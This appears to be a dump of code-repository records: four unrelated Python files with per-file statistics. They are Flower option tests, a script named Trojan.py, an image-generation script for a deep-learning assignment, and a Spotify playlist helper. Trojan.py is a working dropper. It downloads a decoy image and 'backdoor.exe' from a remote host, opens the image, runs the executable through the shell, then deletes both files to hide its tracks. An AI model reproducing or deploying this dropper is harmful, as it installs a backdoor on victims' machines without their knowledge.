apply_options('flower', argv=['--task_runtime_metric_buckets=1,10,inf'])
self.assertEqual([1.0, 10.0, float('inf')], options.task_runtime_metric_buckets)
def test_task_runtime_metric_buckets_no_cmd_line_arg(self):
apply_options('flower', argv=[])
self.assertEqual(Histogram.DEFAULT_BUCKETS, options.task_runtime_metric_buckets)
def test_task_runtime_metric_buckets_read_from_env(self):
os.environ["FLOWER_TASK_RUNTIME_METRIC_BUCKETS"] = "2,5,inf"
apply_env_options()
self.assertEqual([2.0, 5.0, float('inf')], options.task_runtime_metric_buckets)
def test_task_runtime_metric_buckets_no_env_value_provided(self):
apply_env_options()
self.assertEqual(Histogram.DEFAULT_BUCKETS, options.task_runtime_metric_buckets)
def test_port(self):
with self.mock_option('port', 5555):
apply_options('flower', argv=['--port=123'])
self.assertEqual(123, options.port)
def test_address(self):
with self.mock_option('address', '127.0.0.1'):
apply_options('flower', argv=['--address=foo'])
self.assertEqual('foo', options.address)
def test_autodiscovery(self):
"""
Simulate basic Django setup:
- creating celery app
- run app.autodiscover_tasks()
- create flower command
"""
celery_app = self._get_celery_app()
with mock.patch.object(celery_app, '_autodiscover_tasks') as autodiscover:
celery_app.autodiscover_tasks()
self.get_app(capp=celery_app)
self.assertTrue(autodiscover.called)
class TestWarnAboutCeleryArgsUsedInFlowerCommand(AsyncHTTPTestCase):
@patch('flower.command.logger.warning')
def test_does_not_log_warning(self, mock_warning):
mock_app_param = Mock(name='app_param', opts=('-A', '--app'))
mock_broker_param = Mock(name='broker_param', opts=('-b', '--broker'))
class FakeContext:
parent = Mock(command=Mock(params=[mock_app_param, mock_broker_param]))
ctx = FakeContext()
warn_about_celery_args_used_in_flower_command(
ctx=ctx, flower_args=('--port=5678', '--address=0.0.0.0')
)
mock_warning.assert_not_called()
@patch('flower.command.logger.warning')
def test_logs_warning(self, mock_warning):
mock_app_param = Mock(name='app_param', opts=('-A', '--app'))
mock_broker_param = Mock(name='broker_param', opts=('-b', '--broker'))
class FakeContext:
parent = Mock(command=Mock(params=[mock_app_param, mock_broker_param]))
ctx = FakeContext()
warn_about_celery_args_used_in_flower_command(
ctx=ctx, flower_args=('--app=proj', '-b', 'redis://localhost:6379/0')
)
mock_warning.assert_called_once_with(
"You have incorrectly specified the following celery arguments after flower command: "
"[\'--app\', \'-b\']. Please specify them after celery command instead following"
" this template: celery [celery args] flower [flower args]."
)
class TestConfOption(AsyncHTTPTestCase):
def test_error_conf(self):
with self.mock_option('conf', None):
self.assertRaises(IOError, apply_options,
'flower', argv=['--conf=foo'])
self.assertRaises(IOError, apply_options,
'flower', argv=['--conf=/tmp/flower/foo'])
def test_default_option(self):
apply_options('flower', argv=[])
self.assertEqual('flowerconfig.py', options.conf)
def test_empty_conf(self):
with self.mock_option('conf', None):
apply_options('flower', argv=['--conf=/dev/null'])
self.assertEqual('/dev/null', options.conf)
def test_conf_abs(self):
with tempfile.NamedTemporaryFile() as cf:
with self.mock_option('conf', cf.name), self.mock_option('debug', False):
cf.write('debug=True\n'.encode('utf-8'))
cf.flush()
apply_options('flower', argv=['--conf=%s' % cf.name])
self.assertEqual(cf.name, options.conf)
self.assertTrue(options.debug)
def test_conf_relative(self):
with tempfile.NamedTemporaryFile(dir='.') as cf:
with self.mock_option('conf', cf.name), self.mock_option('debug', False):
cf.write('debug=True\n'.encode('utf-8'))
cf.flush()
apply_options('flower', argv=['--conf=%s' % os.path.basename(cf.name)])
self.assertTrue(options.debug)
@unittest.skipUnless(not sys.platform.startswith("win"), 'skip windows')
def test_all_options_documented(self):
def grep(patter, filename):
return int(subprocess.check_output(
'grep "%s" %s|wc -l' % (patter, filename), shell=True))
defined = grep('^define(', 'flower/options.py') - 4
documented = grep('^~~', 'docs/config.rst')
self.assertEqual(defined, documented,
msg='Missing option documentation. Make sure all options '
'are documented in docs/config.rst')
| 39.748252
| 106
| 0.645144
| 677
| 5,684
| 5.172821
| 0.25997
| 0.029983
| 0.048544
| 0.068532
| 0.449172
| 0.408909
| 0.408909
| 0.368075
| 0.296402
| 0.296402
| 0
| 0.01049
| 0.228536
| 5,684
| 142
| 107
| 40.028169
| 0.788141
| 0.018473
| 0
| 0.304762
| 0
| 0
| 0.170132
| 0.031821
| 0
| 0
| 0
| 0
| 0.161905
| 1
| 0.152381
| false
| 0
| 0.104762
| 0.009524
| 0.314286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e91557146c36922257c5f4c9ff456b0ce8b407c
| 534
|
py
|
Python
|
Trojan.py
|
alrocks29/alpha-backdoor
|
16a2d0ffdb183005f687bdf19b25cc918a1f12a0
|
[
"MIT"
] | null | null | null |
Trojan.py
|
alrocks29/alpha-backdoor
|
16a2d0ffdb183005f687bdf19b25cc918a1f12a0
|
[
"MIT"
] | null | null | null |
Trojan.py
|
alrocks29/alpha-backdoor
|
16a2d0ffdb183005f687bdf19b25cc918a1f12a0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import requests
import subprocess
import os
import tempfile
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content)
temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
download("http://ip/image.jpg")
subprocess.Popen("image.jpg", shell=True)
download("http://ip/backdoor.exe")
subprocess.call("backdoor.exe", shell=True)
os.remove("image.jpg")
os.remove("backdoor.exe")
| 21.36
| 44
| 0.724719
| 77
| 534
| 4.922078
| 0.519481
| 0.063325
| 0.073879
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002119
| 0.116105
| 534
| 24
| 45
| 22.25
| 0.800847
| 0.037453
| 0
| 0
| 0
| 0
| 0.167641
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.235294
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e91fe4c0f8f01c97da338f53c30caedc69665c2
| 3,524
|
py
|
Python
|
Assignments/Assignment_1/Q1/task1.py
|
Kaustubh1Verma/CS671_Deep-Learning_2019
|
062002a1369dc962feb52d3c9561a3f1153e0f84
|
[
"MIT"
] | null | null | null |
Assignments/Assignment_1/Q1/task1.py
|
Kaustubh1Verma/CS671_Deep-Learning_2019
|
062002a1369dc962feb52d3c9561a3f1153e0f84
|
[
"MIT"
] | null | null | null |
Assignments/Assignment_1/Q1/task1.py
|
Kaustubh1Verma/CS671_Deep-Learning_2019
|
062002a1369dc962feb52d3c9561a3f1153e0f84
|
[
"MIT"
] | 1
|
2019-06-12T14:02:33.000Z
|
2019-06-12T14:02:33.000Z
|
import numpy as np
import cv2
import math
import random
import os
from tempfile import TemporaryFile
from sklearn.model_selection import train_test_split
# Creating classes.
length=[7,15]
width=[1,3]
col=[]
col.append([0,0,255]) #Blue
col.append([255,0,0]) #Red
interval=15
angles=[]
x=0
while x<180:
angles.append(x)
x+=interval
dirn=1
a1=0
os.mkdir("/home/aj/Desktop/DL2")
for l in length:
a2=0 #a1 0->7,1->15
for w in width:
a3=0 #a2 0->1,1->3
for co in col:
a4=0 #a3 0->red,1->blue
for ang in angles:
flag=0
m=0
os.mkdir("/home/aj/Desktop/DL2/"+str(dirn))
while flag<1000:
img=np.zeros((28,28,3),np.uint8)
x=random.randrange((28-math.ceil(l*math.sin(math.radians(180-ang)))))
y=random.randrange((28-math.ceil(l*math.sin(math.radians(180-ang)))))
endy = y+l*math.sin(math.radians(180-ang))
endy=math.floor(endy)
endx = x+l*math.cos(math.radians(180-ang))
endx=math.floor(endx)
if(0<=endx<=28 and 0<=endy<=28):
cv2.line(img,(x,y),(endx,endy),co,w)
flag=flag+1
cv2.imwrite("/home/aj/Desktop/DL2/"+str(dirn)+"/"+str(a1)+"_"+str(a2)+"_"+str(a4)+"_"+str(a3)+"_"+str(flag)+".png",img)
dirn+=1
a4+=1
a3=a3+1
a2=a2+1
a1=a1+1
outfile = TemporaryFile()
# Creating Frames
train=[]
train_class=[]
test_class=[]
allimg=[]
label=[]
flag=0
# os.mkdir("/home/aj/Desktop/DL2/frames")
for count in range (1,97):
f=[]
# os.mkdir("/home/aj/Desktop/DL2/frames/frame_"+str(count))
f=os.listdir("/home/aj/Desktop/DL2/"+str(count))
for fi in f:
# print(fi)
n=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+fi)
n = n.reshape(2352)
allimg.append(n)
label.append(flag)
flag+=1
for i in range (0,10):
img1=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i],1)
img2=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+1],1)
img3=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+2],1)
img1f=np.concatenate((img1,img2,img3),axis=1)
img4=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+3],1)
img5=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+4],1)
img6=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+5],1)
img2f=np.concatenate((img4,img5,img6),axis=1)
img7=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+6],1)
img8=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+7],1)
img9=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+8],1)
img3f=np.concatenate((img7,img8,img9),axis=1)
imgf=np.concatenate((img1f,img2f,img3f),axis=0)
cv2.imwrite("/home/aj/Desktop/DL2/frames/frame_"+str(count)+"/"+"f"+str(i+1)+".png",imgf)
# print(allimg[0])
# print(label[0:97])
X_train, X_test, y_oldtrain, y_oldtest = train_test_split(allimg, label, test_size=0.40, random_state=42)
# print(y_oldtrain[0:10])
y_oldtrain = np.array(y_oldtrain).reshape(-1)
y_train=np.eye(96)[y_oldtrain]
y_oldtest = np.array(y_oldtest).reshape(-1)
y_test=np.eye(96)[y_oldtest]
np.savez_compressed("/home/aj/Desktop/DL2/outfile",X_train=X_train,X_test=X_test,y_train=y_train,y_test=y_test)
# Creating Video
# img_frame=[]
# for i in range (1,97):
# f=[]
# f=os.listdir("/home/aj/Desktop/DL2/frames/frame_"+str(i))
# path="/home/aj/Desktop/DL2/frames/frame_"+str(i)+"/"
# for file in f:
# img = cv2.imread(path+file)
# height,width,layers = img.shape
# size = (width,height)
# img_frame.append(img)
# out = cv2.VideoWriter("/home/aj/Desktop/DL2/assign1.mp4",0x7634706d,5, size)
# for i in range(len(img_frame)):
# out.write(img_frame[i])
# out.release()
| 32.036364
| 126
| 0.653235
| 641
| 3,524
| 3.524181
| 0.215289
| 0.055777
| 0.12085
| 0.148738
| 0.361664
| 0.351926
| 0.326251
| 0.27313
| 0.216467
| 0.184595
| 0
| 0.071291
| 0.116345
| 3,524
| 110
| 127
| 32.036364
| 0.654143
| 0.200624
| 0
| 0.023529
| 0
| 0
| 0.13625
| 0.120115
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.082353
| 0
| 0.082353
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e949a6f4b8f9d86c879098cae8dde8d91b75f85
| 10,163
|
py
|
Python
|
helpers.py
|
jchanke/mixtape50
|
68d03034b503fd0374b9fcba1c1d5207ed7f0170
|
[
"MIT"
] | 1
|
2022-03-15T11:49:54.000Z
|
2022-03-15T11:49:54.000Z
|
helpers.py
|
jchanke/mixtape50
|
68d03034b503fd0374b9fcba1c1d5207ed7f0170
|
[
"MIT"
] | null | null | null |
helpers.py
|
jchanke/mixtape50
|
68d03034b503fd0374b9fcba1c1d5207ed7f0170
|
[
"MIT"
] | null | null | null |
"""
Does the legwork of searching for matching tracks.
Contains:
(1) Search functions:
- search_message
- search_spotipy
- search_db
- search_lookup
(2) String parsers (to clean title name):
- clean_title
- remove_punctuation
(3) Creates new Spotify playlist.
- create_playlist
"""
from typing import Any, List, Dict, Union
import os
import re
import sqlite3
import time
import spotipy
from spotipy.oauth2 import SpotifyOAuth
from announcer import MessageAnnouncer, format_sse
# Localhost URL to access the application; Flask runs on port 5000 by default
# Adapated from https://github.com/Deffro/statify/blob/dd15a6e70428bd36ecddb5d4a8ac3d82b85c9339/code/server.py#L553
CLIENT_SIDE_URL = "http://127.0.0.1"
PORT = 5000
# Get environment variables
SPOTIPY_CLIENT_ID = os.getenv("SPOTIPY_CLIENT_ID")
SPOTIPY_CLIENT_SECRET = os.getenv("SPOTIFY_CLIENT_SECRET")
SPOTIPY_REDIRECT_URI = f"{CLIENT_SIDE_URL}:{PORT}/callback"
SCOPE = "playlist-modify-public playlist-modify-private playlist-read-private"
# Set up Spotipy
sp = spotipy.Spotify(auth_manager = SpotifyOAuth(client_id = SPOTIPY_CLIENT_ID,
client_secret = SPOTIPY_CLIENT_SECRET,
redirect_uri = SPOTIPY_REDIRECT_URI,
scope = SCOPE,
))
# Create ('instantiate') a MessageAnnouncer object
announcer = MessageAnnouncer()
"""
(1) Search functions:
- search_message
- search_spotipy
- search_db
- search_lookup
"""
def search_message(message: str, max_search_length: int = 10,
query_lookup: Dict[str, list] = dict(), failed_queries: set = set()) -> List[Union[list, Any]]:
"""
search_message(message, max_search_length = 10)
Returns a list of song names (change to ids) matching the message.
Uses regex-style greedy search.
Song names will be limited to [max_search_length] words (default is 10, can
be adjusted.)
Returns songs from Spotify API via spotipy library; if not, checks
Spotify 1.2M songs dataset via an sqlite3 query.
Memoizes successful queries (to query_lookup) and failured queries (to
failed_queries).
https://www.kaggle.com/rodolfofigueroa/spotify-12m-songs
"""
# Split message into list of lower-case words
message = remove_punctuation(message.casefold()).split()
# Gets up to max_search_length words of message
query_length = min(max_search_length, len(message))
# List containing search functions to iterate over
search_functions = [
search_lookup,
search_spotipy,
search_db,
]
# Wait 0.2 seconds to ensure /creating has loaded
time.sleep(0.2)
# Splits query into prefix and suffix, decrementing prefix, until
# - prefix exactly matches a song
# - suffix can be expressed as a list of songs
for i in range(query_length):
prefix, suffix = message[:query_length - i], message[query_length - i:]
prefix, suffix = " ".join(prefix), " ".join(suffix)
announcer.announce(format_sse(event = "add", data = prefix))
# Only search if suffix is not known to fail
if suffix in failed_queries:
time.sleep(0.1)
announcer.announce(format_sse(event = "drop", data = prefix))
continue # back to the start of the 'for' loop
# Looping through search functions,
for search_function in search_functions:
# Search for tracks matching prefix
prefix_results = search_function(prefix, query_lookup = query_lookup)
if prefix_results:
query_lookup[prefix] = prefix_results
print(f"Try: {prefix} in {search_function.__name__.replace('search_', '')}")
# In announcer: replace prefix, add each track in prefix_results
announcer.announce(format_sse(event = "drop", data = prefix))
for track in map(lambda tracks: tracks[0]["name"], prefix_results):
announcer.announce(format_sse(event = "add", data = remove_punctuation(clean_title(track.casefold()))))
time.sleep(0.1)
# Base case: if prefix is whole message, suffix == "", so we should just return prefix
if suffix == "":
print(f"All done!")
announcer.announce(format_sse(event = "lock in"))
return prefix_results
# Recursive case: make sure suffix it can be split into songs as well
suffix_results = search_message(suffix, max_search_length = max_search_length,
query_lookup = query_lookup, failed_queries = failed_queries)
# If both are valid, return joined list
if suffix_results:
results = prefix_results + suffix_results
query_lookup[" ".join([prefix, suffix])] = results
return results
# Suffix cannot be split into songs, drop prefix
for track in map(lambda tracks: tracks[0]["name"], prefix_results):
announcer.announce(format_sse(event = "drop", data = remove_punctuation(clean_title(track.casefold()))))
time.sleep(0.1)
print(f"\"{suffix}\" suffix can't be split.")
break # suffix doesn't work, try next prefix-suffix pair
# Prefix not found in all search functions, drop it
else:
print(f"\"{prefix}\" doesn't work, moving on.")
announcer.announce(format_sse(data = "prefix doesn't work, dropping it"))
announcer.announce(format_sse(event = "drop", data = prefix))
# Recursive case: failure
failed_queries.add(" ".join(message))
return []
def search_lookup(query: str, query_lookup: Dict[str, list]) -> list:
"""
Checks query_lookup (a dictionary created at the initial function call
of search_message) and returns the results of the query if it has
already been found.
"""
# Checks query_lookup dict
if query in query_lookup:
return query_lookup[query]
else:
return []
def search_spotipy(query: str, query_lookup: Dict[str, list]) -> list:
"""
Uses Spotify API via spotipy library to return a list of songs (name
& id) which match the query.
Note: the query_lookup parameter is not used. It is only included
in the definition because query_lookup is passed to search_functions.
"""
# Attributes to return
attributes = ["name", "id"]
# Search for tracks where the name matches query
results = sp.search(q=f"track:\"{query}\"", type="track", limit=50)
results = results["tracks"]["items"]
results = [{ attr: item[attr] for attr in attributes } for item in results if remove_punctuation(clean_title(item["name"].casefold())) == remove_punctuation(query)]
# If no results, return empty list:
if results == []:
return []
else:
return [results]
def search_db(query: str, query_lookup: Dict[str, list]) -> list:
"""
Searches tracks.db (1.2 million songs from Spotify from the Kaggle
database) to return a list of songs (name & id) which match the
query.
https://www.kaggle.com/rodolfofigueroa/spotify-12m-songs
"""
# Import sqlite database
tracks = sqlite3.connect("tracks.db")
db = sqlite3.Cursor(tracks)
# SQLite3 query
results = db.execute("SELECT name, id FROM tracks WHERE name_cleaned = ?", [remove_punctuation(query)]).fetchall()
results = list(map(lambda item: {
"name": item[0],
"id": item[1],
}, results))
# If no results, return empty list
if results == []:
return []
else:
return [results]
"""
(2) String parsers (to clean title name):
- clean_title
- remove_punctuation
"""
def clean_title(title):
"""
Cleans title by performing the following transformations in order:
- Remove substrings enclosed in (...) or [...] and preceding whitespace (using regex greedy matching)
- Remove " - " and substring after
- Remove " feat.", " ft(.)", or " featuring" and substring after
https://stackoverflow.com/questions/14596884/remove-text-between-and
"""
# (Greedy) replace substrings between (...) and []
title = re.sub(r"\s+\(.+\)", "", title)
title = re.sub(r"\s+\[.+\]", "", title)
# Remove " - " and subsequent substring
title = re.sub(r" - .*", "", title)
# Remove " feat(.) ", " ft(.) ", or " featuring " (but not "feature") and substring after
title = re.sub(r"\W+(ft[:.]?|feat[:.]|featuring)\s.*", "", title)
return title
def remove_punctuation(title):
"""
Removes punctuation by performing the following transformations:
- Delete XML escape sequences: & " < > '
- Replace "/", "//", etc. and surrounding whitespace with " " (in medley titles)
- Replace "&" and surrounding whitespace with " and "
- Remove the following characters from the string: !"#$%'‘’“”()*+,-.:;<=>?@[\]^_—`{|}~
- Strips surrounding whitespace
"""
title = re.sub(r"&[amp|quot|lt|gt|apos];", "", title)
title = re.sub(r"\s*\/+\s*", " ", title)
title = re.sub(r"\s*&\s*", " and ", title)
title = re.sub(r"[!\"#$%'‘’“”()*+,-.:;<=>?@[\\\]^_—`{|}~]", "", title)
title = re.sub(r"\s{2,}", " ", title)
return title.strip()
"""
(3) Creates new Spotify playlist.
"""
def create_playlist(results):
"""
Takes the result of search_message as input.
Constructs a playlist (via the spotipy library).
Returns the Spotify id of the playlist.
"""
# Process items
items = list(map(lambda songs: songs[0]["id"], results))
# Create playlist
playlist = sp.user_playlist_create(
user=sp.me()["id"],
name="mixtape50",
public=False,
collaborative=False,
description="Created with Mixtape50: https://github.com/jchanke/mixtape50."
)
sp.playlist_add_items(playlist_id=playlist["id"], items=items)
return playlist["id"]
| 34.686007
| 168
| 0.630326
| 1,248
| 10,163
| 5.022436
| 0.258814
| 0.029834
| 0.014359
| 0.015795
| 0.25
| 0.190491
| 0.185227
| 0.17007
| 0.124442
| 0.115507
| 0
| 0.012773
| 0.25278
| 10,163
| 293
| 169
| 34.686007
| 0.812352
| 0.378136
| 0
| 0.169492
| 0
| 0
| 0.110387
| 0.038053
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059322
| false
| 0
| 0.067797
| 0
| 0.228814
| 0.033898
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|